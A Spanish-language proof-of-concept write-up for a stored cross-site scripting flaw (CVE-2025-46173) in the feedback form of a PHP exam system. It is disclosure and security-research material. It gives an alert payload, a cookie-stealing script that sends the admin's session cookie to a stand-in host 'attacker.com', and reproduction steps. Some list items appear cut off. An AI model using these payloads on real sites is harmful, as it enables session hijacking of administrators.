
prueba de concepto para el CVE-2025-46173
CVE-2025-46173 es una vulnerabilidad de Cross-Site Scripting (XSS) Almacenado descubierta en Online Exam Mastering System 1.0 de code-projects. La vulnerabilidad existe en el componente feedback.php donde la entrada del usuario en el campo Nombre no está adecuadamente sanitizada, permitiendo a un actor malicioso inyectar JavaScript arbitrario. Cuando un administrador visualiza este feedback en el panel de administración (dash.php), el payload se ejecuta en el navegador del administrador, lo que provoca secuestro de sesión y una potencial escalada de privilegios.
feedback.php, dash.phpUn usuario envía el siguiente payload en el campo Nombre del formulario de feedback:
<script>alert(document.cookie)</script>

Cuando el administrador posteriormente visualiza el feedback enviado en dash.php, el payload se ejecuta:

La cookie de sesión del administrador queda expuesta a través de document.cookie, la cual puede ser exfiltrada:
<script>
fetch("http://attacker.com/steal?cookie=" + document.cookie);
</script>
Clonar o configurar la versión vulnerable desde code-projects.
Navegar a localhost/exam/feedback.php.
Rellenar el campo "Nombre" con:
<script>alert(document.cookie)</script>
Enviar el formulario.
Iniciar sesión como administrador y visitar dash.php?q=3 para ver el feedback.
El script se ejecutará en el contexto del administrador.
La explotación exitosa permite a un atacante remoto:
&, <, >, ").htmlspecialchars() de PHP, o una combinación de validación en el frontend y sanitización en el backend.Pruthu Raut LinkedIn | TryHackMe Top 2% | GitHub
Las capturas de pantalla son solo con fines educativos. Todas las pruebas se realizaron en un entorno local.
Esta información se proporciona únicamente con fines educativos y de investigación. No la utilice en sistemas que no posea o para los cuales no tenga permiso explícito para realizar pruebas.